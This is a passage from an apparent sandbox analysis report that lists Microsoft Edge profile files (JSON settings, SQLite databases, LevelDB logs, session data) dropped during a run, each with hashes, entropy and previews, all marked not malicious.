                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1452
                                                                                                                                                                                                                  Entropy (8bit):5.287526653429432
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n+:YcCpWsktsHnfc7CvsfgCgakhYhbj
                                                                                                                                                                                                                  MD5:C11A0C2888E9122AF3E0A9532E7CF485
                                                                                                                                                                                                                  SHA1:213F8630A4D6B265DB899E1B4FED27EC8F2F1C75
                                                                                                                                                                                                                  SHA-256:F08277C5DFC76862C95DA3763626FC4A099530B656C9ED5C42DE6E3079D64B57
                                                                                                                                                                                                                  SHA-512:BB02933E6DF73CF073C94460869B99200E08C1B293D476B6F7C76F012B0BF9126A60031A31555CB755DF9C464B16272FEB6B1E0C0528FFAF5BB934F5E87A279E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1452
                                                                                                                                                                                                                  Entropy (8bit):5.287526653429432
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n+:YcCpWsktsHnfc7CvsfgCgakhYhbj
                                                                                                                                                                                                                  MD5:C11A0C2888E9122AF3E0A9532E7CF485
                                                                                                                                                                                                                  SHA1:213F8630A4D6B265DB899E1B4FED27EC8F2F1C75
                                                                                                                                                                                                                  SHA-256:F08277C5DFC76862C95DA3763626FC4A099530B656C9ED5C42DE6E3079D64B57
                                                                                                                                                                                                                  SHA-512:BB02933E6DF73CF073C94460869B99200E08C1B293D476B6F7C76F012B0BF9126A60031A31555CB755DF9C464B16272FEB6B1E0C0528FFAF5BB934F5E87A279E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                  Entropy (8bit):1.1144062936620691
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBns:JkIEumQv8m1ccnvS6nW0cI9nj1a
                                                                                                                                                                                                                  MD5:FD4C7C4152AFB9DD4084FC6F998036DA
                                                                                                                                                                                                                  SHA1:268ECCFCA9D8F504D8EE37A06F4C071BE7EBA353
                                                                                                                                                                                                                  SHA-256:AAAF81A8A3B78FFF01D773EC22E645FB958C134F26D33D167BCBB08D007A3F92
                                                                                                                                                                                                                  SHA-512:AE1A547DBC042D1FA17FC82D95B1E857AAFB649FD5451BEB1E859782538116E8F29359975BB24B739EC6C371ED521B3886EF0F33364535C4456E2056E8E799DE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                  Entropy (8bit):0.8307038620100359
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:TLSOUOq0afDdWec9sJlAz7Nm2z8ZI7J5fc:T+OUzDbg3eAzA2ztc
                                                                                                                                                                                                                  MD5:B18967139991D9CA13DF7E493540A358
                                                                                                                                                                                                                  SHA1:97411C14A8503C11248BE7404C9A79BA5146D40C
                                                                                                                                                                                                                  SHA-256:CCC36F21951B4CB357C57DA0CCA1FFF3B4C7027230C10FD8BCB72C0AFF66141F
                                                                                                                                                                                                                  SHA-512:473AE1B215B181785EA65F87E34155D5976C7AD1FA487B025E1C8711BFD127E99066990105CDA8D6F4804459118361217455AB1644803D22E6ECB164EEEFD630
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):9402
                                                                                                                                                                                                                  Entropy (8bit):5.0879422366456035
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:stFkdAsa0JaFvrE9kurx3G88bV+FiAxU/PrYJ:stFjsa0JCDsr+bGiPw
                                                                                                                                                                                                                  MD5:80C939E415F0E49A405EF90D1BDC3FD0
                                                                                                                                                                                                                  SHA1:157438D74B39B95A87C0ED9CCD3CEB781AF4C81E
                                                                                                                                                                                                                  SHA-256:242C762323C1CAC250BABEBEFAA9DADDC652102AFA3D1FAAD79FF3E1F3EBB6A5
                                                                                                                                                                                                                  SHA-512:23BD36020D0E47E764650F3816D9811188C750EC0F5BE2CE1032908166AE157BFF9FFE81CA8FE40E31A9276E66051FEFDF7FD79A30048B766BA9AEF21442C581
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379025969301478","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                  Entropy (8bit):5.566063713502838
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:W2d9RQWG/W5wA2f4QH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPDbIvsG2rwXe+p0tW:WYzQx/WaA2fFHu1jaaubTO1tW
                                                                                                                                                                                                                  MD5:211A36A5AEB953DB50145EAD4B20FC0F
                                                                                                                                                                                                                  SHA1:11FE33220D8427EFBB7E31E0E401EA667779B745
                                                                                                                                                                                                                  SHA-256:55FB866713106BCB1BF1038C52D279F8D399FA42E92A6EB68439AE434455F605
                                                                                                                                                                                                                  SHA-512:AB90FE82D199CA97E7BD910F554DA374EE24DCE5CD8327D3535248EE3A43514989040BF46D0FDC962D7470E800246A0816E985A732B47C7B8854B5082AA3C7DC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379025968289386","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379025968289386","location":5,"ma
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):213
                                                                                                                                                                                                                  Entropy (8bit):2.7541301583060975
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljljljl:S85aEFljljljljljljljljl
                                                                                                                                                                                                                  MD5:046CC08D163FC4578CD1B77A5D0965AC
                                                                                                                                                                                                                  SHA1:92F503E605C30974BAF385F1619F1269B81DEC57
                                                                                                                                                                                                                  SHA-256:693A60684AA9FF4F01CB6027E9C938F4701C0C898AFC224A0776CB1E18E87166
                                                                                                                                                                                                                  SHA-512:E8B1DF36A237BCBBAD897146CA247EDF75466B2A4030FEC620C46932B5C31137F2931CD2758534E4308AED3FB9CC40EDF2D7646A38530BCC5E6D7069C19A3B1F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                  Entropy (8bit):5.112643276287564
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQgMQL+q2PN723oH+TcwtrQMxIFUt8OPQ4vGKWZmw+OPQuQLVkwON723oH+TcwJ:7oZQ+vVaYebCFUt8Oo4vGKW/+OouQV5b
                                                                                                                                                                                                                  MD5:9AAC2AF1E39F0265414CF91C9E3D4918
                                                                                                                                                                                                                  SHA1:A88048B0028C15305132DAC8C10D399B0F945CB6
                                                                                                                                                                                                                  SHA-256:159EAC84977A63DE308E5BC7EC83BB6D4320D46CFA4856C2016FE10D80F6D0D4
                                                                                                                                                                                                                  SHA-512:7A6E6FC2BAE6C4362FE9E4B875EC35112F611F0D683F1248FF5F97F4DB7E8F91C190892914764463E00A9C4628BF2D1645FA7D4FDE34D244868E228A59AA21FA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:09.406 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/18-15:06:09.407 1eec Recovering log #3.2024/12/18-15:06:09.409 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1287
                                                                                                                                                                                                                  Entropy (8bit):3.667046836594888
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:3njvEmxPGPdt1zo4RC5VjAkIIFUJoaHWet1zoH:3njruPhxAAkIIOoLY2
                                                                                                                                                                                                                  MD5:8884D248A782B4E61AB1A4731CD2E2C5
                                                                                                                                                                                                                  SHA1:3F45C07C15D0BB7763DDC073E834CD757112FB5E
                                                                                                                                                                                                                  SHA-256:DC2208AD0259FC7795A8819F07F546F3066A4BBC549213F15C0FCD1E35A8AB1E
                                                                                                                                                                                                                  SHA-512:20296CAE5523A20D3A1F65336C112C94DE648EEAF64C60D104B90DDD5053C662EAA5177FE38EA5FE2859A8060A6BFF0012A38FC89C353C22E06F0FF4E1A98F2D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:SNSS......../.J............/.J......"./.J............/.J......../.J......../.J......../.J....!.../.J................................/.J./.J1..,..../.J$...fcf98dd2_ba55_4157_8169_91e0109d6dcf..../.J......../.J....>o}........./.J..../.J......................../.J....................5..0..../.J&...{46F3A197-DB49-410A-81B3-94975C835573}....../.J......../.J.......|..../.J....7...file:///C:/Users/user/AppData/Roaming/New_2025.webp.............!...........................................................................................................)......)..@.......X...............P.......................................................v...7...f.i.l.e.:./././.C.:./.U.s.e.r.s./.e.n.g.i.n.e.e.r./.A.p.p.D.a.t.a./.R.o.a.m.i.n.g./.N.e.w._.2.0.2.5...w.e.b.p...................................8.......0.......8....................................................................... .......................................................P...$...b.7.4.b.3.4.e.c.-.d.9.a.c.-.4.5.4.4.-.b.b.f.2.-.0.9
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                  Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                  MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                  SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                  SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                  SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:SQLite format 3
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):356
                                                                                                                                                                                                                  Entropy (8bit):5.1268297786509605
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQEvAq2PN723oH+Tcwt7Uh2ghZIFUt8OPQWhZmw+OPQBzkwON723oH+Tcwt7Uh9:7oEvAvVaYebIhHh2FUt8OoS/+Ooh5Oa0
                                                                                                                                                                                                                  MD5:244F4D5470C20E104CD35AB3389FDF8D
                                                                                                                                                                                                                  SHA1:116DF5AB87344E9C2DB4AE9389698508B0C75BA5
                                                                                                                                                                                                                  SHA-256:C355A878AE8CAF1DB0C94B75C68524ACB42AB5CB9DB6F0C05701A619DE0EFD23
                                                                                                                                                                                                                  SHA-512:8CCEE9E59717126BCC399785FD6FFCFD9227B1E6674C8AF2D7AD9D414E8705BDD849F184CE97C14614501EA714F94F39A6511836D8F5066BFC285C74ED620221
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.289 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/18-15:06:08.467 1e20 Recovering log #3.2024/12/18-15:06:08.468 1e20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):438
                                                                                                                                                                                                                  Entropy (8bit):5.220741195740046
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:7oqi+vVaYebvqBQFUt8Ooxk/+OorV5OaYebvqBvJ:7o6VaYebvZg8OoxkojOaYebvk
                                                                                                                                                                                                                  MD5:C70808EFC3D8E4C5DB6DD5D408DEA671
                                                                                                                                                                                                                  SHA1:3010A1606E8004ED5A54B54B98CA84EE026BA22C
                                                                                                                                                                                                                  SHA-256:16013CC269B9E4945622451A95CDF783F5387AEB8B6FAB718D5A500D03758FAE
                                                                                                                                                                                                                  SHA-512:3A296BB5779CF0C1632E7AB7C834C17807FB523CCA5929E64646EEE3C63D4C07589E3FA47F41C0604C33C26E9A01C264DBA306A216B5DE29C9DF7C8382FED590
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:09.418 1f0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/18-15:06:09.420 1f0c Recovering log #3.2024/12/18-15:06:09.423 1f0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                  Entropy (8bit):0.3886039372934488
